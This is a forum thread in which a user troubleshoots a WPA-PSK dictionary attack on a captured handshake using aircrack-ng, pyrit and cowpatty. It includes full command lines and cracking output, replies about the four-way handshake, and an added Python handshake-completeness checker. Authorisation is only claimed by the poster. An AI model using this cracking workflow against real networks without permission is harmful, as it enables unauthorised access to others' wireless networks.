
Thread: HOW_TO test WPA_handshake

  1. #1
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default HOW_TO test WPA_handshake

    Hi! I have one problem with a captured WPA-PSK handshake. I used cowpatty to recover password+pyrit. Everything goes well until I try to put my *.cap file to cowpatty, it reports:
    dem@dem-laptop:~$ cowpatty -d cow.out -s SeaOcelotWL -r /home/dem/Deauth_Ocelot_WPA/psk-01.cap

    "End of pcap capture file, incomplete four-way handshake exchange. Try using a
    different capture."
    So a question is, how can I test captured WPA-PSK for complete handshake exchange?
    And a full description of entered commands:
    Code:
    dem@dem-laptop:~$ aircrack-ng psk-01.cap
    Opening psk-01.cap
    Read 19428 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:1E:C1:B6:63:00  SeaOcelotWL               WPA (1 handshake)
    
    Choosing first network as target.
    
    Opening psk-01.cap
    Please specify a dictionary (option -w).
    
    
    Quitting aircrack-ng...
    dem@dem-laptop:~$ pyrit -e SeaOcelotWL create_essid
    
    Created ESSID 'SeaOcelotWL'
    dem@dem-laptop:~$ pyrit -f /home/dem/brut/wpa.lst import_passwords
    
    Importing from '/home/dem/brut/wpa.lst'
    2830423 lines read. Flushing buffers...
    All done.
    dem@dem-laptop:~$ pyrit batch
    
    Working on ESSID 'SeaOcelotWL'
    Computed 2775377 PMKs so far; 3247 PMKs per second; 27062 passwords buffered.
    Stopped reading workunits...
    Computed 2819446 PMKs so far; 3256 PMKs per second; 0 passwords buffered.ed..
    All done. 3269.53 PMKs/s total.
    #1: 'CUDA-Device #1 'GeForce 9800M GTS'': 2817.9 PMKs/s (Occ. 99.9%; RTT 3.0)
    #2: 'CPU-Core (SSE2)': 455.3 PMKs/s (Occ. 99.9%; RTT 3.0)
    Batchprocessing done.
    dem@dem-laptop:~$ pyrit -e SeaOcelotWL -f cow.out export_cowpatty
    
    Exporting to 'cow.out'...
    2830414 entries written. All done.
    dem@dem-laptop:~$ cowpatty
    cowpatty: Must supply a pcap file with -r
    
    Usage: cowpatty [options]
    
    	-f 	Dictionary file
    	-d 	Hash file (genpmk)
    	-r 	Packet capture file
    	-s 	Network SSID (enclose in quotes if SSID includes spaces)
    	-2 	Use frames 1 and 2 or 2 and 3 for key attack (nonstrict mode)
    	-c 	Check for valid 4-way frames, does not crack
    	-h 	Print this help information and exit
    	-v 	Print verbose information (more -v for more verbosity)
    	-V 	Print program version and exit
    
    dem@dem-laptop:~$ cowpatty -d cow.out -s SeaOcelotWL -r /home/dem/psk-01.cap
    
    End of pcap capture file, incomplete four-way handshake exchange.  Try using a
    different capture.
    dem@dem-laptop:~$ cowpatty -d cow.out -s SeaOcelotWL -r /home/dem/Deauth_Ocelot_WPA/psk-01.cap
    
    
    End of pcap capture file, incomplete four-way handshake exchange.  Try using a
    different capture.

  2. #2
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Ok, first off, please tell us plainly you are in fact testing a handshake collected from your own network. I do not want to help if you're looking for "alternate sources of internet".
    You. Are. Doing. It. Wrong.
    -Gitsnik

  3. #3
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default

    Quote Originally Posted by kidFromBigD View Post
    Ok, first off, please tell us plainly you are in fact testing a handshake collected from your own network. I do not want to help if you're looking for "alternate sources of internet".
    Oh yea, he's going to tell the truth now.....
    Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Which version of cowpatty are you using of which backtrack? The problem is the way cowpatty is coded and if you do not have a patched version it will fail.

  5. #5
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    Quote Originally Posted by pureh@te View Post
    Which version of cowpatty are you using of which backtrack?
    I have installed it from Festor repo
    Actually cowpatty works for me, with other capture:
    Code:
    dem@dem-laptop:~$ cowpatty -d cow.out -s SeaOcelotWL -r /home/dem/OCEAN_WPA/psk-01.cap
    cowpatty 4.6 - WPA-PSK dictionary attack.
    
    Collected all necessary data to mount crack against WPA/PSK passphrase.
    Starting dictionary attack.  Please be patient.
    key no. 10000: troostgr
    key no. 20000: servicetree
    key no. 30000: pristupnost
    key no. 40000: nawasihi
    key no. 50000: katzenmusik
    key no. 60000: gilabend
    key no. 70000: e'caillures
    key no. 80000: blanchflower's
    key no. 90000: WISENTENCE
    key no. 100000: Fdxcy4zc1RTRhNP
    key no. 110000: well-assessed
    key no. 120000: swpclient
    #.....and so on
    #and at last my perfomance:
     2830415 passphrases tested in 18.32 seconds:  154481.34 passphrases/second
    As you see I have cowpatty 4.6

  6. #6
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    Quote Originally Posted by Barry View Post
    Oh yea, he's going to tell the truth now.....
    O.K. Truth? That is our ship's wifi network, set by me. "Sea Ocelot" ship's name operated by Thome offshore, as you see it in essid. Believe or not that is your decision...

  7. #7
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Well there is your problem. I have no idea who fester is, therefore he wouldn't have the patches that we have. A close friend of mine wrote the patch. I'll explain the problem.

    You do not have a full capture. There are 4 parts to a WPA handshake capture. It will work in aircrack-ng because aircrack looks at packets 1 and 2 or 2 and 3. The problem with cowpatty is it looks only at packet 4. Now as of version 4.6, which you have, Josh implemented our patch into cowpatty. So give cowpatty an argument of -2 and it should work.

    By the way, this is a forum for backtrack Linux, not general questions. If you had backtrack you would have the properly patched cowpatty. The -2 option Josh implemented only works most of the time, so if that doesn't work for you then you need our version.
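
Added example, not part of the original thread and not code from cowpatty or aircrack-ng: a small Python classifier for the four EAPOL-Key messages discussed in the post above, reporting whether a capture holds the full exchange or only the frame pairs (1 and 2, or 2 and 3) named in the `-2` help text. The helper names, the replay-counter assumption and the sample frames are constructed for illustration.

```python
import struct

# Key Information flag bits of the EAPOL-Key descriptor (IEEE 802.11i)
PAIRWISE, INSTALL, ACK, MIC = 0x0008, 0x0040, 0x0080, 0x0100

def classify(eapol):
    """Return (message_no, replay_counter) for a pairwise EAPOL-Key frame, else None."""
    if len(eapol) < 99 or eapol[1] != 3:          # 802.1X packet type 3 = EAPOL-Key
        return None
    info, _keylen, replay = struct.unpack_from(">HHQ", eapol, 5)
    (data_len,) = struct.unpack_from(">H", eapol, 97)
    if not info & PAIRWISE:                       # group-key handshake, not the 4-way
        return None
    ack, mic = bool(info & ACK), bool(info & MIC)
    if ack and not mic:
        return 1, replay
    if ack and mic and info & INSTALL:
        return 3, replay
    if mic and not ack:                           # 2 carries the RSN/WPA IE, 4 has no key data
        return (2 if data_len else 4), replay
    return None

def assess(frames):
    """Report which handshake messages a capture holds and which pairs line up."""
    seen = {}
    for frame in frames:
        hit = classify(frame)
        if hit:
            seen.setdefault(hit[0], set()).add(hit[1])
    m = lambda n: seen.get(n, set())
    # Assumption: no retransmissions, so 1/2 share counter n and 3/4 share n + 1.
    pair_1_2 = bool(m(1) & m(2))
    pair_2_3 = any(r + 1 in m(3) for r in m(2))
    complete = any(r + 1 in m(3) and r + 1 in m(4) for r in m(1) & m(2))
    return {"messages": sorted(seen), "pair_1_2": pair_1_2,
            "pair_2_3": pair_2_3, "complete": complete}

def build(info, replay, data=b""):
    """Constructed sample frame; nonce, IV, RSC, key ID and MIC are left zeroed."""
    body = struct.pack(">BHHQ", 2, info, 16, replay) + bytes(80)
    body += struct.pack(">H", len(data)) + data
    return struct.pack(">BBH", 2, 3, len(body)) + body

# Constructed capture: messages 1-3 present, message 4 missing.
SAMPLE = [build(0x008A, 1), build(0x010A, 1, bytes(22)), build(0x13CA, 2, bytes(56))]

if __name__ == "__main__":
    print(assess(SAMPLE))
```

The input to `classify` is the 802.1X payload only; stripping the radiotap, 802.11 and LLC/SNAP headers from a real capture is left to the reader's pcap library.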

  8. #8
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    Thanks pureh@te, now almost all clear for me. I didn't mention my Backtrack distro, because seems like I have a problem with detecting my CUDA card in it.
    Pyrit shows me only two CPUs when I entered list_cores command and no CUDA device. I have posted this issue to your HOWTO post-"pyrit-cuda-nvidia-tutorial-nvidia-overclock-instructions". That's why I have installed pyrit to my ordinary Ubuntu 9.04 amd64 and I think that is problem in driver version which CUDA card uses. Fester repos has 180.44 and Backtrack's is 185.18.08-bt5 version, but of course, I may be wrong. Anyway I want try 190 beta driver in Backtrack4 pre, NVIDIA have just released it and posted CUDA support.

  9. #9
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default

    Demontager, just out of interest, is your query here related to the ISPS requirements of the company / ship ?
    Or this part of the classification society's external audit or internal audit ?

    Just interested as haven't come across checks of this type onboard yet, in fact haven't got wireless on the ships at all as far as I know.. but might have to check if some crew hook up a router now

  10. #10
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    So, I checked pyrit in Backtrack4 pre and as I told it can't recognize CUDA device, it shows 2 CPUs only.
    Code:
    root@track-laptop:~# pyrit benchmark
    
    The ESSID-blobspace seems to be empty; you should create an ESSID...
    
    Running benchmark for at least 60 seconds...
    
    CPU-Core (x86): 227.07 PMKs/s, (99.92% occupancy)
    CPU-Core (x86): 224.65 PMKs/s, (84.16% occupancy)
    
    Benchmark done. 451.72 PMKs/s total.
    And another thing, I have tested cowpatty in BT4 without hashed tables, see what I got:
    Code:
    root@track-laptop:/pentest/wireless/cowpatty# ./cowpatty -f ~/ocelot/wpa.lst -s SeaOcelotWL -r ~/ocelot/psk-01.cap
    cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
    
    Collected all necessary data to mount crack against WPA2/PSK passphrase.
    Starting dictionary attack.  Please be patient.
    key no. 1000: 0duopoly
    key no. 2000: 0observe
    key no. 3000: 0trilogy
    key no. 4000: 1ABDELFATTAH
    ^CUnable to identify the PSK from the dictionary file. Try expanding your
    passphrase list, and double-check the SSID.  Sorry it didn't work out.
    
    4495 passphrases tested in 42.69 seconds:  105.29 passphrases/second
    That is the same cap file, so that means Festor's 4.6 cowpatty hadn't been patched.
    And one more, I have supplied cowpatty 4.6 ver on Ubuntu 9.04 with -2 option, but still same issue:
    Code:
    dem@dem-laptop:~$ cowpatty -2 -v -d cow.out -s SeaOcelotWL -r /home/dem/psk-01.cap
    cowpatty 4.6 - WPA-PSK dictionary attack. 
    
    End of pcap capture file, incomplete four-way handshake exchange.  Try using a
    different capture.
    For this moment I didn't check other NVIDIA drivers for Backtrack 4, but I'll, soon.
